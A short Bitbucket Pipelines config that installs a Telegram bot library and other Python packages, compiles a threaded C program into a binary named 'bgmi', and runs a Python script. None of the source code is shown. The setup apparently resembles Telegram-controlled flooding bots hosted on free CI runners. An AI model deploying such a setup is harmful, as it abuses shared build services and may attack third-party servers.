pipelines:
  default:
    - step:
        name: Run Python Script
        image: python:3.10
        script:
          - echo "MADE BY ULTRA BHAI.."
          - pip install telebot pymongo aiohttp psutil pytz
          - gcc -o bgmi rs.c -pthread
          - chmod +x bgmi
          - python3 mmm.py
